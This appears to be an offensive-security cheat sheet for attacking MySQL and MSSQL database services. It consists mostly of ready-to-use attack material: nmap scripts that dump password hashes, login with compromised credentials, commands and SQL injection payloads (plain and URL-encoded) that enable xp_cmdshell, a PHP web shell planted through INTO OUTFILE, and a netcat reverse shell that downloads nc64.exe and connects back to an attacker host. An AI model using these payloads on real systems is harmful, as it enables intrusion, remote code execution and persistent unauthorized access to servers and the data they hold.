MYSQL (3306)
1. Basics
Scanning
sudo nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>Initiate connection
mysql -h <IP> -u <username> -p <pass> [-P <port>]
sqsh -S <IP> -U <username> -P <password> -D <database>
For windows sql instances
impacket-mssqlclient <domain>/<compromised username>:<password>@<IP> -windows-auth2. Reverse Shell
1. Initiate Connection with either mysql or sqsh
# In sqsh, you need to use GO after writing the query to send it
Do one by one each command:
# Get users that can run xp_cmdshell
Use master
EXEC sp_helprotect 'xp_cmdshell'
# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
# This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE
EXEC master..xp_cmdshell 'whoami'Manual Code Execution:
Steps to enable `xp_cmdshell`
'; EXEC sp_configure "show advanced options", 1; -- //
'; RECONFIGURE; -- //
'; EXEC sp_configure "xp_cmdshell", 1; -- //
'; RECONFIGURE; -- //
'; EXEC xp_cmdshell "whoami"; -- //
Oneliner
'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami"; -- //
URL encoded oneliner
%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22%3B%20%2D%2D%20%2F%2FPayload Example:
Insert webshell into web root directory -
"<?php system($_GET['cmd']);?>", null, null, null INTO OUTFILE "/web/root/directory/webshell.php"
Initiating reverse shell with nc64.exe via injected webshell -
curl http://<IP>/nc64.exe -o c:/windows/temp/nc64.exe
c:/windows/temp/nc64.exe -e cmd.exe <IP> <port>Last updated